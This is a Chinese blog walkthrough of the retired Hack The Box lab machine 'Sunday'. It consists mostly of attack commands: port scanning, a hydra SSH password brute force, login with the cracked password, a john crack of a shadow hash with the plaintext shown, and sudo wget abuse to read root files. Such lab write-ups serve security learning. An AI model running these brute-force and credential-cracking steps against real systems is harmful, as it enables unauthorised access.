HTB-靶机-Sunday

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.76

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.76 -o ./Sunday

也可以使用官方的方法进行快速的扫描

masscan -p1-65535 10.10.10.76 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
sudo nmap -Pn -sV -sC -p$ports 10.10.10.76

没发现啥详细信息,再更改参数扫描一把

sudo nmap -n -vvv -sS -sV -sC --stylesheet https://raw.githubusercontent.com/snovvcrash/snovvcrash.github.io/master/reports/nmap/nmap-bootstrap.xsl -p79,111,22022,47581,48935 10.10.10.76

根据开放的79端口,确认目标靶机含有用户sunny,又发现有开放ssh端口,直接进行爆破看看

hydra -f -l sunny -P sunnypass.lst -s 22022 10.10.10.76 ssh

密码是根据用户名组合出来的字典

 直接ssh登录

sshpass -p 'sunday' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oStrictHostKeyChecking=no -p 22022 sunny@10.10.10.76

在sunny家目录执行sudo -l发现测试的执行文件,但是不能提权,只好遍历下系统中的文件,发现一个备份文件

 发现含有shadow备份文件,且当前用户可以查看/etc/passwd文件,那么可以通过获取hash进行破解密码

破解用户sammy的hash密码
echo 'sammy:x:101:10:sammy:/export/home/sammy:/bin/bash' >sammypasswd
echo 'sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::' >sammy_shadow
unshadow sammypasswd sammyshadow > sammyhash
john sammyhash --wordlist=/usr/share/wordlists/rockyou.txt --format=sha256crypt
john sammyhash --show
sammy:cooldude!:101:10:sammy:/export/home/sammy:/bin/bash

得到密码之后就可以读取user.txt内容,然后执行sudo -l发现可以通过wget的-i参数读取root权限的文件

至此拿到目标的两个flag.txt

 

posted @ 2021-03-30 10:58  皇帽讲绿帽带法技巧  阅读(168)  评论(0编辑  收藏  举报